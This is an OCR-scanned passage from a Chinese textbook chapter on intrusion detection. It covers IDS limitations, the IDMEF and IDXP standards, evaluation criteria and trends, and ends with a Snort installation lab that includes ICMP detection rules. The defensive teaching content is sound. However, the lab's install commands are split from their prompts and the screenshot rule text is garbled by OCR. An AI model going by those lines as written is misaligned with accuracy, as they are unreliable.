攻击 者 的 行为 提供 了 独特 的 机 会 。 

图 7.7 即 为 上 述 整个 安全 系统 的 示意 图 。 图 7.7 无 法 表示 所 有 的 数据 流 ， 目 的 是 说 明 
安全 单元 是 一 个 网 络 安全 整体 。 说 明 入 侵 检测 系统 需要 协同 ， 同 时 其 他 所 有 的 安全 工具 也 
需要 协同 ， 协 同 工 作 的 目的 是 保障 信息 系统 的 安全 。 可 以 把 所 有 这 些 协 同 工 作 的 工具 或 者 
设备 整体 看 作 一 个 安全 工具 ， 它 可 以 保证 信息 有 相对 的 安全 性 。 


防火 墙 
外 部 网 


图 7.7 网 络 安全 系统 示意 图 


7.6 入侵 检测 分 析 


入 侵 检测 技术 是 一 种 当今 非常 重要 的 动态 安全 技术 ， 如 果 与 传统 的 静态 安全 技术 共 
使 用 ， 可 以 大 大 提高 系统 的 安全 防护 水 平 。 

一 个 安全 系统 至 少 应 该 满足 用 户 系统 的 保密 性 、 完 整 性 及 可 用 性 要 求 。 但 是 ， 随 着 网 
络 连接 的 迅速 扩展 ， 特 别 是 互联 网 大 范围 的 开放 以 及 金融 领域 网 络 的 接 入 ， 越 来 越 多 的 系 
统 遭 到 入 侵 攻击 的 威胁 。 这 些 威胁 大 多 是 通过 挖掘 操作 系统 和 应 用 服务 程序 的 弱点 或 者 缺 
陷 来 实现 的 。 


可 
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对 付 破坏 系统 企图 的 理想 方法 是 建立 一 个 完全 安全 的 系统 。 这 不 仅 要 求 所 有 的 用 户 能 
识别 和 认证 自己 ， 而 且 还 要 求 用 户 采 用 各 种 各 样 的 加 密 技 术 和 强制 访问 控制 策略 来 保护 数 
据 。 实 际 上 这 一 点 是 很 难 做 到 的 。 

@ 要 将 所 有 已 安装 的 带 安 全 缺陷 的 系统 转换 成 安全 系统 是 不 现实 的 ， 即 使 真正 付 诸 

实践 ， 也 需要 相当 长 的 时 间 。 

@ ”加 密 技术 本 身 存在 一 定 的 问题 。 比 如 密 钥 的 生成 、 传 输 、 分 配 和 保存 以 及 加 密 算 

法 的 安全 性 。 
@ ”访问 控制 和 保护 模型 本 身 存 在 一 定 的 问题 。 
@ ”静态 的 安全 控制 措施 不 足以 保护 安全 对 象 属性 。 通 常 ， 安 全 访问 控制 等 级 和 用 户 
的 使 用 效率 成 反比 。 在 一 个 系统 中 ， 担 保安 全 特性 的 静态 方法 可 能 会 过 于 简单 、 
不 充分 ， 或 者 是 系统 过 度 地 限制 用 户 。 例 如 ， 静 态 安 全 措施 未 必 能 阻止 违背 安全 
策略 造成 的 对 数据 文件 的 浏览 ， 强 制 访问 控制 仅 允许 用 户 访问 具有 合适 通道 的 数 
据 ， 造 成 系统 使 用 的 不 便 。 因 此 ， 动 态 的 安全 措施 (如 行为 跟踪 ) 对 检测 和 尽 可 能 
地 阻止 入 侵 是 必要 的 。 
@ ”安全 系统 易 受 内 部 用 户 滥用 特权 的 攻击 。 一 些 安全 技术 (如 防火 墙 ) 能 够 防止 一 些 
外 部 攻击 ， 对 来 自 内 部 的 攻击 就 无 能 为 力 。 
@ ”在 实践 中 ， 建 立 完全 安全 的 系统 是 不 可 能 的 。 现 今 的 操作 系统 和 应 用 程序 中 不 可 
能 没有 缺陷 。 在 软件 工程 中 存在 着 软件 测试 不 充足 、 软 件 生命 周期 缩短 等 问题 。 

由 于 市 场 竞 争 激 烈 ， 软 件 生命 周期 正 不 断 地 被 缩短 ， 这 样 常常 导致 软件 设计 或 测试 不 
充分 ， 并 且 有 些 软件 的 规模 越 来 越 大 ， 复 杂 度 越 来 越 高， 运行 中 用 户 的 操作 行为 、 软 件 安 
装 平台 、 软 件 与 软件 之 间 交 互 的 不 可 控 性 都 可 能 带 来 问题 。 虽 然 软 件 商 经 常会 针对 某 些 具 
体 缺陷 发 布 一 些 修补 软件 ， 但 系统 的 安全 状态 只 持续 一 段 时 间 。 此 外 ， 设 计 和 实现 一 个 整 
体 安全 系统 也 相当 困难 。 

基于 上 述 几 类 问题 的 解决 难度 ， 实 用 的 方法 是 建立 比较 容易 实现 的 安全 系统 ， 同 时 按 
照 一 定 的 安全 策略 建立 相应 的 安全 辅助 系统 。 入 侵 检测 系统 就 是 这 样 一 类 系统 。 安 全 软件 
的 开发 方式 基本 上 就 是 按照 这 个 思路 进行 的 。 就 目前 系统 安全 状况 而 言 ， 系 统 存在 被 攻击 
的 可 能 性 。 如 果 系 统 遭 到 攻击 ， 只 要 尽 可 能 地 检测 到 ， 甚 至 是 实时 地 检测 到 ， 然 后 采取 适 
当 的 处 理 措施 ， 就 可 以 避免 造成 更 大 的 损失 。 

过 去 ， 防 范 网 络 攻击 最 常用 的 方法 是 使 用 防火 墙 。 为 了 更 好 地 说 明 入 侵 检测 的 必要 
性 ， 对 入 侵 检测 与 防火 墙 做 一 个 比较 。 

“防火 墙 ” 是 在 被 保护 网 络 周边 建立 的 、 分 隔 被 保护 网 络 与 外 部 网 络 的 系统 。 防 火 墙 
技术 是 通过 对 网 络 作 拓扑 结构 和 服务 类 型 上 的 隔离 来 加 强 网 络 安全 的 一 种 手段 。 它 的 保护 
对 象 是 网 络 中 有 明确 闭合 边界 的 网 块 ， 防 范 对 象 则 是 来 自 被 保护 网 块 外 部 的 对 网 络 安全 的 
威胁 。 防 火 墙 通过 在 网 络 边 界 上 建立 相应 的 网 络 通信 监控 系统 ， 拒 绝 非法 的 连接 请 求 ， 从 
而 达到 保护 网 络 安全 的 目的 。 

采用 防火 墙 技术 的 前 提 条 件 如 下 。 

@ ”被 保护 的 网 络 具 有 明确 定义 的 边界 和 服务 。 

@ ”网 络 安 全 的 威胁 仅 来 自 外 部 网 络 。 

通过 监测 、 限 制 或 更 改 穿 过 防火 墙 的 数据 流 ， 尽 可 能 地 对 外 部 网 络 屏蔽 有 关 被 保护 网 
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络 的 信息 和 结构 ， 可 实现 对 网 络 的 安全 保护 ， 降 低 网 络 安全 的 风险 。 但 仅仅 使 用 防火 墙 保 
障 网 络 安全 是 远 远 不 够 的 。 首 先 ， 防 火 墙 本 身 会 有 各 种 漏洞 和 后 门 ， 有 可 能 被 外 部 黑客 攻 
破 ; 其 次 ， 防 火 墙 不 能 阻止 内 部 攻击 ， 对 内 部 入 侵 者 来 说 防火 墙 毫 无 作用 ; 另外， 有 些 外 
部 访问 可 以 绕 开 防火 墙 。 例如， 内 部 用 户 通 过 调制 解 调 器 拨号 接 入 Intemet， 从 而 开辟 了 一 
个 不 安全 的 通路 ， 而 这 一 连接 并 没有 通过 防火 墙 ， 防 火 墙 对 此 没有 任何 监控 能 

因此 ， 仅 仅 依赖 防火 墙 系统 并 不 能 保证 足够 的 安全 。 入 侵 检 测 是 防火 墙 的 合理 补充 ， 
为 网 络 安全 提供 实时 的 入 侵 检测 并 采取 相应 的 防护 手段 ， 如 记录 证 据 用 于 跟踪 入 侵 者 和 灾 
难 恢复 、 发 出 警报 甚至 终止 进程 、 断 开 网 络 连接 等 。 它 从 计算 机 网 络 系统 中 的 若干 关键 点 
收集 信息 ， 并 分 析 这 些 信息 ， 看 看 网 络 中 是 否 有 违反 安全 策略 的 行为 和 遭 到 袭击 的 迹象 。 
入 侵 检测 被 认为 是 防火 墙 之 后 的 第 二 道 安 全 闸门 ， 在 不 影响 网 络 性 能 的 情况 下 ， 能 对 网 络 
进行 监测 ， 从 而 提供 对 内 部 攻击 、 外 部 攻击 和 误 操 作 的 实时 保护 。 

入 侵 检测 系统 一 般 不 是 采取 预防 的 措施 以 防止 入 侵 事 件 的 发 生 ， 入 侵 检 测 作 为 安全 技 
术 其 主要 目的 如 下 。 

@ 识别 入 侵 者 。 

@ 识别 入 侵 行为 。 

@ ”检测 和 监视 已 成 功 的 安全 突破 。 

@ 为 对 抗 入 侵 ， 及 时 提供 重要 信息 ， 阻 止 事 件 发 生 和 事态 扩大 。 

可 见 入 侵 检测 对 于 建立 一 个 安全 系统 来 说 是 非常 必要 的 ， 它 可 弥补 传统 安全 保护 措施 
的 不 足 。 

作为 一 类 目前 备 受 关注 的 网 络 安全 技术 ， 入 侵 检测 技术 也 有 很 多 不 足 ， 具 体 如 下 。 

(1) 入 侵 检测 系统 本 身 还 在 迅速 发 展 和 变化 ， 尚 未 成 熟 。 目 前 ， 绝 大 多 数 的 商业 入 侵 
检测 系统 的 工作 原理 和 病毒 检测 相似 ， 自 身 带 有 一 定 规模 和 数量 的 入 侵 特征 模式 库 ， 可 以 
定期 更 新 。 这 种 方式 有 很 多 弱点 : 不 灵活 ， 仅 对 已 知 的 攻击 手段 有 效 ; 特征 模式 库 的 提取 
和 更 新 依赖 于 手工 方式 ， 维 护 不 易 。 具 有 自 适 应 能 力 、 能 自我 学 习 的 入 侵 检 测 系 统 还 尚未 成 
熟 ， 检 测 技 术 在 理论 上 还 有 待 突破 。 所 以 入 侵 检 测 系统 领域 当前 正 处 于 不 断 发 展 成 长 时 期 。 

(2) 现 有 的 入 侵 检 测 系统 错 报 率 (或 称 为 虚 警 率 ) 偏 高 ， 严 重 干扰 了 检测 结果 。 如 果 入 侵 
检测 系统 对 原本 不 是 攻击 的 事件 产生 了 错误 的 警报 ， 则 假 的 警报 一 般 称 为 虚 警 (False 
了 Positive)。 通 常 这 些 错 报 会 干扰 管理 员 的 注意 力 ， 产 生 以 下 两 种 后 果 。 

@ 忽略 警报 ， 但 这 样 做 的 结果 和 安装 入 侵 检 测 系统 的 初衷 相悖。 

@ 重新 调整 临界 阔 值 ， 使 系统 对 虚报 的 事件 不 再 敏感 ， 但 这 样 做 之 后 ， 一 旦 有 真 的 
相关 攻击 事件 发 生 ， 入 侵 检测 系统 将 不 再 报警 ， 这 同样 损失 了 入 侵 检测 系统 的 功效 。 

(3) 事件 响应 与 恢复 机 制 不 完善 。 这 一 部 分 对 入 侵 检测 系统 非常 重要 ， 但 目前 几乎 都 
被 忽略 并 没有 一 个 完善 的 响应 恢复 体系 ， 远 不 能 满足 人 们 的 期 望 和 要 求 。 

(4) 入 侵 检测 系统 与 其 他 安全 技术 的 协作 性 不 够 。 如 今 ， 网 络 系统 中 往往 采用 很 多 其 
他 的 安全 技术 ， 如 防火 墙 、 身 份 认 证 系统 、 网 络 管理 系统 等 。 如 果 它 们 之 间 能 够 相互 沟 
通 、 相 互 配合 ， 对 入 侵 检测 系统 进一步 增强 自身 的 检测 和 适应 能 力 是 有 帮助 的 。 

(5) 入 侵 检 测 系 统 缺 少 对 检测 结果 做 进一步 说 明和 分 析 的 辅助 工具 ， 这 妨碍 了 用 户 进 
一 步 理解 看 到 的 数据 或 图 表 。 

(6) 入 侵 检测 系统 缺乏 国际 统一 的 标准 。 
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9 没有 关于 描述 入 侵 过 程 和 提取 攻击 模式 的 统一 规范 。 
@ 没有 关于 检测 和 响应 模型 的 统一 描述 语言 。 
@ 检测 引擎 的 定制 处 理 没有 标准 化 。 


7.7 入 侵 检测 的 发 展 
7.7.1 入 侵 检测 标准 


入 侵 检 测 技术 的 标准 化 是 提高 入 侵 检测 产品 功能 和 加 强 技术 合作 的 重要 手段 ， 到 目前 
为 止 ， 还 没有 一 个 被 广泛 接受 的 入 侵 检 测 相关 国际 标准 。 美 国 国 防 高 级 研究 计划 署 
(DARPA) 和 互联 网 工程 任务 组 (IETF) 的 入 侵 检 测 工 作 组 (LIDWG) 在 这 方面 做 了 很 多 工作 ， 我 
国 的 有 关 网 络 安全 产品 检测 部 门 也 做 了 很 多 卓有成效 的 工作 ， 给 出 了 主机 入 侵 检测 产品 和 
网 络 入 侵 检测 产品 的 规范 。 
IDWG 提出 的 建议 草案 包括 3 部 分 内 容 ， 即 入 侵 检测 消息 交换 格式 IDMEF)、 入 侵 检 
测 交换 协议 IDXP) 和 隧道 轮廓 (Tunnel Profile)。 

(1) IDMEF 描述 了 入 侵 检测 系统 输出 信息 的 数据 模型 ， 并 解释 了 使 用 此 模型 的 基本 原 
理 。 该 数据 模型 用 XML 实现 ， 并 设计 了 一 个 XML 文档 类 型 定义 。 自 动 入 侵 检测 系统 可 
以 使 用 IDMEF 提供 的 标准 数据 格式 对 可 疑 事件 发 出 警报 ， 提 高 商业 、 开 放 资 源 和 研究 系 
统 之 间 的 互 操作 性 。IDMEF 最 适用 于 入 侵 检测 分 析 器 (或 称 为 “探测 器 ”) 和 接收 警报 的 管 
理 器 (或 称 为 “控制 台 ”) 之 间 的 数据 信道 。 

(2) IDXP 是 一 个 用 于 入 侵 检测 实体 之 间 交 换 数据 的 应 用 层 协 议 ， 能 够 实现 IDMEF 消 
息 、 非 结构 文本 和 二 进 制 数据 之 间 的 交换 ， 并 提供 面向 连接 协议 之 上 的 双方 认证 、 完 整 性 
和 保密 性 等 安全 特征 。IDXP 是 BEEP 的 一 部 分 ， 后 者 是 一 个 用 于 面向 连接 的 异步 交互 通 
用 应 用 协议 ，IDXP 的 许多 特色 功能 (如 认证 、 保 密 性 等 ) 都 是 由 BEEP 框架 提供 的 。 


7.7.2 入侵 检 测评 测 


以 下 从 对 入 侵 检 测评 估 的 作用 、 测 试 评 估 入 侵 检测 系统 的 标准 和 测试 评估 现状 等 几 个 
方面 对 入 侵 检测 评估 进行 介绍 。 
1. 对 入 侵 检测 系统 进行 测试 和 评估 的 作用 


(1) 有 助 于 更 好 地 描述 入 侵 检测 系统 的 特征 。 通 过 测试 评估 ， 可 以 更 好 地 认识 、 理 解 
入 侵 检 测 系统 的 处 理 方法 、 所 需 资源 及 环境 ， 建 立 比 较 入 侵 检测 系统 的 基准 ， 领 会 各 检测 


方法 之 间 的 关系 。 
(2) 对 入 侵 检测 系统 的 各 项 性 能 进行 评估 ， 确 定 入 侵 检 测 系统 的 性 能 级 别 及 其 对 运行 
环境 的 影响 。 


(3) 利用 测试 和 评估 结果 ， 可 做 出 一 些 预测 ， 推 断 入 侵 检测 系统 发 展 的 趋势 ， 评 估 风 
险 ， 制 订 可 实现 的 入 侵 检 测 系统 质量 目标 (如 可 靠 性 、 可 用 性 、 速 度 、 精 确 度 等 )、 花 费 及 
开发 进度 。 

(4) 根据 测试 和 评估 的 结果 ， 对 入 侵 检测 系统 进行 改善 ， 即 发 现 系统 中 存在 的 问题 ， 
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并 进行 改进 ， 从 而 提高 系统 的 各 项 性 能 指标 。 
2. 测试 评估 入 侵 检测 系统 性 能 的 标准 


(1) 准确 性 。 准 确 性 (Accuracy) 指 入 侵 检测 系统 从 各 种 行为 中 正确 地 识别 入 侵 的 能 
当 一 个 入 侵 检 测 系统 的 检测 不 准确 时 ， 就 有 可 能 把 系统 中 的 合法 活动 当 作 入 侵 行 为 ， 并 标 
识 为 异常 ( 虚 警 现象 )。 

(2) 处 理性 能 。 处 理性 能 (Performance) 指 一 个 入 侵 检 测 系 统 处 理 源 数据 的 速度 。 当 入 
侵 检测 系统 的 处 理性 能 较 差 时 ， 就 不 可 能 实现 实时 的 入 侵 检测 系统 ， 反 而 可 能 成 为 整个 系 
统 的 瓶颈 ， 进 而 严重 影响 整个 系统 的 性 能 。 

(3) 完备 性 。 完 备 性 (Completeness) 指 入 侵 检 测 系 统 能 够 检测 出 所 有 攻击 行为 的 能 
如 果 有 一 个 攻击 行为 ， 无 法 被 入 侵 检测 系统 检测 出 来 ， 那 么 该 入 侵 检 测 系 统 就 不 具有 检测 
完备 性 ， 也 就 是 说 ， 它 把 对 系统 的 入 侵 活动 当 作 正 常 行为 ( 漏 报 现象 )。 由 于 攻击 类 型 、 攻 
击 手段 变化 很 快 ， 很 难得 到 关于 攻击 行为 的 所 有 知识 ， 所 以 关于 入 侵 检测 系统 的 检测 完备 
性 的 评估 相对 比较 困难 。 

(4) 容错 性 。 由 于 入 侵 检测 系统 是 检测 入 侵 的 重要 手段 ， 所 以 它 成 为 很 多 入 侵 者 攻击 
的 首选 目标 。 入 侵 检测 系统 自身 必须 能 够 抵御 对 其 自身 的 攻击 ， 特 别 是 拒绝 服务 (Denial- 
of-Service) 攻 击 。 由 于 大 多 数 的 入 侵 检测 系统 是 运行 在 极 易 遭受 攻击 的 操作 系统 和 硬件 平 
台 上 ， 这 就 使 得 系统 的 容错 性 (Fault Tolerance) 变 得 特别 重要 ， 在 测试 评估 入 侵 检测 系统 时 
必须 考虑 这 一 点 。 

(5) 及 时 性 。 及 时 性 (Timeliness) 要 求 入 侵 检 测 系统 必须 尽快 地 分 析 数 据 ， 并 把 分 析 结 
果 传 播 出 去 ， 以 使 系统 安全 管理 者 能 够 在 入 侵 攻击 尚未 造成 更 大 危害 以 前 做 出 反应 ， 阻 止 
入 侵 者 进一步 的 破坏 活动 。 与 处 理性 能 因素 相 比 ， 及 时 性 的 要 求 更 高 ， 它 不 仅 要求 入 侵 检 
测 系统 的 处 理 速度 要 尽 可 能 快 ， 而 且 要 求 传 播 、 反 映 检测 结果 信息 的 时 间 尽 可 能 短 。 

美国 加 州 大 学 的 Nicholas J.Puketza 等 人 把 测试 分 为 三 类 ， 分 别 与 前 面 的 性 能 指标 相对 
应 ， 即 入 侵 识 别 测试 ( 入 侵 检测 系统 有 效 性 测试 )、 资 源 消 耗 测试 (Resource Usage Tests) 及 强 
度 测试 。 入 侵 识别 测试 测量 入 侵 检测 系统 区 分 正常 行为 和 入 侵 行为 的 能 力 ， 主 要 指标 是 检 
测 率 和 虚 警 率 ; 资源 消耗 测试 测量 入 侵 检测 系统 占用 系统 资源 的 状况 ， 考 虑 的 主要 因素 是 
硬盘 占用 空间 、 内 存 消耗 等 ， 强 度 测试 主要 检测 入 侵 检 测 系统 在 强 负荷 运行 状况 下 检测 效 
果 是 否 受 影 响 ， 主 要 包括 大 负载 、 高 密度 数据 流量 情况 下 对 检测 效果 的 检测 。 

3. 入 侵 检 测 系统 测试 评估 现状 以 及 存在 的 问题 

虽然 入 侵 检 测 系 统 及 其 相关 技术 已 获得 了 很 大 的 进展 ， 但 关于 入 侵 检测 系统 的 性 能 检 
测 及 其 相关 评测 工具 、 标 准 以 及 测试 环境 等 方面 的 研究 工作 还 很 缺乏 。 

在 测试 评估 过 程 中 ， 采 用 模拟 的 方法 来 生成 测试 数据 ， 而 模拟 入 侵 者 实施 攻击 面临 的 
困难 是 只 能 掌握 已 公布 的 攻击 ， 而 对 于 新 的 攻击 方法 就 无 法 得 知 。 这 样 的 后 果 是 ， 即 使 测 
试 没有 发 现 入 侵 检测 系统 的 潜在 弱点 ， 也 不 能 说 明 入 侵 检测 系统 是 一 个 完备 的 系统 。 不 
过 ， 可 以 通过 分 类 选取 测试 例子 ， 使 之 尽量 覆盖 各 种 不 同 种 类 的 攻击 ， 同 时 不 断 更 新 入 侵 
知识 库 ， 以 适应 新 的 情况 。 

此 外 ， 由 于 测试 评估 入 侵 检测 系统 的 数据 都 是 公开 的 ， 如 果 针 对 测试 数据 设计 待 测试 
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入 侵 检 测 系统 ， 则 该 入 侵 检 测 系统 的 测试 结果 肯定 比较 好 ， 但 这 并 不 能 说 明 它 实际 运行 的 
状况 就 好 。 

入 侵 检 测 作为 一 门 正在 蓬勃 发 展 的 技术 ， 出 现 的 时 间 并 不 是 很 长 。 相 应 地 ， 对 入 侵 检 
测 技术 进行 评测 出 现 得 更 晚 ， 它 肯定 有 很 多 不 完善 和 有 待 改进 的 地 方 。 几 个 比较 关键 的 问 
题 是 ， 网 络 流量 仿真 、 用 户 行为 仿真 、 攻 击 特征 库 的 构建 、 评 估 环 境 的 构建 以 及 评测 结果 
的 分 析 等 。 


7.7.3 ”入 侵 检 测 发 展 


1. 入 侵 技术 的 发 展 


近年 来 ， 系 统 和 网 络 的 漏洞 被 不 断 发 现 ， 入 侵 技术 无 论 是 从 规模 上 还 是 方法 上 都 发 和 
了 变化 ， 入 侵 的 手段 与 技术 也 有 了 “进步 与 发 展 ”， 这 种 “进步 与 发 展 ” 直 接 加 速 了 人 作 
对 入 侵 检测 系统 的 研究 和 推广 工作 。 

从 最 近 几 年 的 发 展 趋势 看 ， 入 侵 技术 的 发 展 与 演化 主要 反映 在 以 下 几 个 方面 。 

1) 入 侵 和 攻击 的 复杂 化 与 综合 

由 于 网 络 防范 技术 的 进步 和 多 元 化 ， 使 得 攻击 的 难度 增加 ， 因 此 入 侵 者 在 实施 入 侵 或 
攻击 时 往往 同时 采取 多 种 入 侵 手段 ， 以 保证 入 侵 成 功 ， 攻 击 本 身 复杂 了 ， 入 侵 时 采取 的 手 
段 综合 化 了 ， 这 就 使 得 入 侵 检 测 技术 也 要 不 断 更 新 ， 以 便 能 跟 上 入 侵 的 发 展 变 化 趋势 。 

2) 入 侵 主体 的 间接 化 

入 侵 主体 的 间接 化 ， 即 实施 入 侵 和 攻击 的 主体 隐蔽 化 ， 通 过 一 定 的 技术 ， 可 掩盖 攻击 
主体 的 源 地 址 及 主机 位 置 。 使 用 隐蔽 技术 后 ， 对 于 被 攻击 对 象 来 说 ， 攻 击 的 主体 是 无 法 直 
接 确定 的 。 现 在 有 不 少 攻击 都 是 借助 其 他 脆弱 主机 或 网 络 来 攻击 目标 主机 ， 而 他 们 自己 却 
隐藏 在 背后 ， 因 此 不 容易 被 发 现 和 查 出 ， 即 使 能 够 发 现 攻击 ， 也 不 一 定 能 够 有 效 地 追踪 到 
攻击 者 。 一 般 的 攻击 者 在 攻击 别人 时 ， 肯 定 不 希望 自己 的 攻击 被 发 现 ， 至 少 是 自己 的 真实 
卫 地 址 不 被 追踪 到 ， 因 此 ， 他 们 会 想方设法 地 掩盖 自己 的 行踪 。 

3) 入 侵 和 攻击 的 规模 扩大 

在 初期 ， 入 侵 和 攻击 往往 是 针对 某 一 个 公司 或 网 站 ， 其 攻击 的 目的 常常 是 某 些 网 络 技 
术 爱 好 者 的 猎奇 行为 ， 当 然 也 不 排除 商业 的 盗窃 与 破坏 行为 。 现 在 的 攻击 主要 是 针对 网 络 
的 ， 也 就 是 说 ， 他 们 的 目的 就 是 要 使 目标 网 络 崩 溃 或 瘫痪 ， 这 样 造成 的 危害 更 严重 、 波 及 
面 更 广 。 此 外 ， 由 于 战争 对 电子 技术 与 网 络 技术 的 依赖 性 越 来 越 大 ， 未 来 战争 中 的 电子 战 
与 信息 战 将 不 可 避免 。 对 于 信息 战 ， 无 论 其 规模 还 是 技术 都 与 一 般 意义 上 的 计算 机 网 络 的 
入 侵 与 攻击 不 可 相提并论 。 信 息 战 的 成 败 、 国 家 主干 通信 网 络 的 安全 就 像 国家 的 领土 安全 
一 样 不 容 忽视 。 

4) 入 侵 和 攻击 技术 的 分 布 化 

以 前 常用 的 入 侵 与 攻击 行为 往往 由 单机 执行 ， 由 于 防范 技术 的 发 展 使 得 此 类 行为 不 能 
奏效 。 因 此 ， 攻 击 者 现在 多 采取 使 用 主机 同时 攻击 一 台 机 器 的 办 法 ， 这 就 是 分 布 式 拒绝 服 
务 攻击 (DDoS)， 它 能 够 在 很 短 时 间 内 造成 被 攻击 主机 瘫痪。DDoS 攻击 通过 控制 数 台 脆弱 
主机 ， 将 其 武装 成 一 台 极 具 攻 击 力 的 攻击 者 ， 然 后 同时 对 目标 主机 发 起 攻击 。 由 于 此 类 分 
布 式 攻击 的 单机 信息 模式 与 正常 通信 没有 差异 ， 使 用 通常 的 入 侵 检测 方法 无 法 及 时 检测 出 
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攻击 ， 所 以 往往 在 攻击 发 动 的 初期 不 能 被 发 现 。 

5) 攻击 对 象 的 转移 

入 侵 与 攻击 常 以 网 络 为 侵犯 的 主体 ， 但 近期 ， 攻 击 行为 却 发 生 了 策略 性 的 改变 ， 由 攻 
凸 网 络 改 为 攻击 网 络 的 防护 系统 ， 且 愈演愈烈 。 攻 击 者 详细 地 分 析 了 入 侵 检测 系统 的 审计 
方式 、 特 征 描述 、 通 信 模 式 ， 从 中 找 出 入 侵 检测 系统 的 弱点 ， 然 后 加 以 攻击 。 入 侵 者 一 旦 
攻破 了 入 侵 检测 系统 等 安全 部 件 ， 就 能 够 长 驱 直入 ， 肆 无 忌 伦 地 攻击 目标 主机 ， 其 攻击 行 
为 无 法 得 到 记录 ， 很 难 取证 ， 因 此 也 就 很 难得 到 应 有 的 惩罚 。 


2. 入 侵 检测 技术 的 发 展 


以 下 是 入 侵 检测 技术 发 展 的 几 个 重要 方向 。 

1) 功能 与 性 能 提高 

为 提高 检测 准确 率 ， 其 他 领域 的 一 些 概念 和 方法 被 引入 到 入 侵 检 测 系统 中 ， 如 神经 网 
络 、 模 糊 理论 、 免 疫 系 统 、 数 据 挖掘 等 。 这 些 方法 主要 是 为 了 增强 入 侵 检测 系统 的 学 习 能 
力 ， 使 得 入 侵 检测 系统 可 以 比较 智能 地 检测 出 未 知 攻击 。 但 这 些 方法 基本 上 还 都 处 于 研究 
阶段 ， 入 侵 检 测 系统 产品 还 没有 很 好 地 实现 这 些 方法 。 

此 外 ， 网 络 速度 也 构成 了 对 检测 准确 率 的 挑战 之 一 。 现 在 网 络 的 规模 越 来 越 大 ， 人 入 侵 
检测 系统 应 用 的 场合 也 越 来 越 广 ， 网 络 的 速度 在 不 断 提高 ， 因 此 ， 入 侵 检测 系统 产品 必须 
能 够 适应 高 速 网 络 的 要 求 ， 否则 就 会 出 现 大 量 的 漏 报 现象 。 为 了 能 够 适应 高 速 网 络 的 要 
求 ， 入 侵 检测 系统 中 现 有 的 一 些 技术 ， 将 不 得 不 进行 改进 ， 有 的 将 被 弃 用 。 
因此 ， 改 进 现 有 的 入 侵 检测 方法 ， 提 出 新 的 、 可 以 应 用 于 大 规模 高 速 网 络 的 入 侵 检测 
方法 ， 对 于 适应 新 的 应 用 需要 、 提 高 入 侵 检测 系统 的 准确 率 非常 必要 。 

2) 检测 和 防范 分 布 式 攻击 和 拒绝 服务 攻击 

由 于 分 布 式 攻击 隐蔽 性 强 、 攻 击 力 大 ， 因 此 现在 使 用 分 布 式 攻击 进行 入 侵 的 情况 越 来 
越 多 ， 而 现在 的 入 侵 检测 系统 产品 对 于 分 布 式 攻击 的 防范 能 力 普遍 较 弱 。 如 何 准确 地 描述 
分 布 式 攻击 ， 检 测 到 可 疑 攻击 后 如 何 将 分 开 的 攻击 特征 合并 ， 从 中 确定 分 布 式 攻击 ， 都 是 
值得 认真 研究 的 课题 。 

3) 实现 入 侵 检测 系统 与 其 他 安全 部 件 的 协同 

实现 网 络 与 信息 的 安全 是 一 项 系统 工程 ， 不 是 某 一 种 单独 的 安全 部 件 就 可 以 完成 的 。 
只 有 在 不 同 的 安全 部 件 之 间 实 现 协同 工作 ， 才 能 更 好 地 发 挥 它 们 各 自 的 作用 ， 进 一 步 保 证 
网 络 与 信息 的 安全 。 

4) 入 侵 检测 系统 的 标准 化 工作 

尽管 入 侵 检测 系统 经 历 了 20 多 年 的 发 展 ， 近 几 年 又 成 为 网 络 与 信息 安全 领域 的 一 个 
研究 热点 ， 但 到 目前 为 止 ， 尚 没有 一 个 相关 的 国际 标准 出 现 ， 国 内 也 没有 入 侵 检测 系统 方 
面 的 标准 。 入 侵 检测 系统 的 标准 化 工作 必 将 成 为 业界 关注 的 热点 。 

5) 入 侵 检 测 系统 的 测试 和 评估 

对 于 入 侵 检测 系统 的 测试 和 评估 ， 虽 然 不 是 入 侵 检测 系统 本 身 的 技术 ， 但 对 于 促进 入 
侵 检测 系统 的 发 展 和 入 侵 检 测 系统 产品 的 推广 非常 重要 。 

以 上 从 5 个 方面 介绍 了 入 侵 检 测 系 统 研究 中 尚 待 解决 的 技术 问题 ， 这 些 问 题 的 解决 将 
会 大 大 促进 入 侵 检测 系统 的 发 展 。 


比 
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7.8 上 机 实践 


实验 环境 如 图 7.8 所 示 。 


192.168.10.1 
0 四 192.168.10.5 
Windows RHEL 5.1(Linux) 
入 侵 者 Snort 


图 7.8 实验 环境 


实验 步 又 如 下 : 

(1) 在 192.168.10.5 上 安装 Snort。 到 http://www.snort.org/ 上 下 载 snort-2.8.0.2.tar.gz 和 
snortrules-pr-2.4.tar.gz。 安 装 Snort 之 前 先 下 载 并 且 安 装 libpcap-devel、pcre 和 pcre-devel。 
将 snort-2.8.0.2.tar.gz 解压 后 进入 snort-2.8.0.2， 然 后 依次 执行 以 下 命令 : 


[root@localhost snort-2.8. 
[root@localhost snort-2.8. 
[root@localhost snort-2. 
[root@localhost snort-2.8. 
[root@localhost snort-2. 
[root@localhost snort-2.8. 
[root@localhost snort-2.8. 
[root@localhost snort-2. 


将 snortrules-pr-2.4.tar.gz 解压 后 ， 将 其 中 的 规则 文件 全 部 复制 到 /etc/snort/rules 下 。 编 
辑 /etc/snort/snort.conf 文件 ， 将 “var RULE PATH ../rules ” 改 为 “var RULE PATH 
/etc/snort/rules”。 编 辑 /etc/snort/rules/icmp.rules 文件 ， 如 图 7.9 所 示 。 


.2]# ./configure 

.2]# make 

.2]# make install 

.2]# mkdir -p /etc/snort/rules 
.2]# cp etc/*.conf /etc/snort 

.2]# cp etc/*.config /etc/snort 
-2]# cp etc/unicode.map /etc/snort 
.2]# mkdir /var/log/snort 


ooooomomoo 
一 全) 


3 lemp.rules (JetcJs5morUrulesj - gedit 


文件 介 ”编辑 全 查看 投 索 (5) 工具 GD 文档 人 帮助 


Dicmpmles x 


区 These rules are potentially bad TCMP traffic. They inctude most of the 
25# ICMP scanning tools and other “BAD" ICHP traffic (Such as redirect host) 
125 人 # 

于 # Other ICMP rules are included in icmp-info.rules 


CEUert icm $EXTERNAL_NET any -> $HOME_NET any (msg:"TEST:ICMP Ping" 


3 
Blalert icmp 4EXTERNAL NET any -> $HOME_NET any (msg TCM TSS Pinger' itype:8; content:"ISSPNGRO®; 
depth:32; reference: arachnids, 158; classtype:attempted- recon; sid:465; rev:3;) 
2 alert icmp $EXTERNAL_NET any -> $HOME_NET any (msg:"ICMP L3retriever Ping"; icode:0; itype:8; 
content: "ABCDEFGHI JKLMNOPORSTUVWABCDEFGHI" ; depth: 32; reference:arachnids, 311; classtype:attempted-recon; | 
Sid: 466; rev: 4;) - - 
行 3, 到 名 插入 


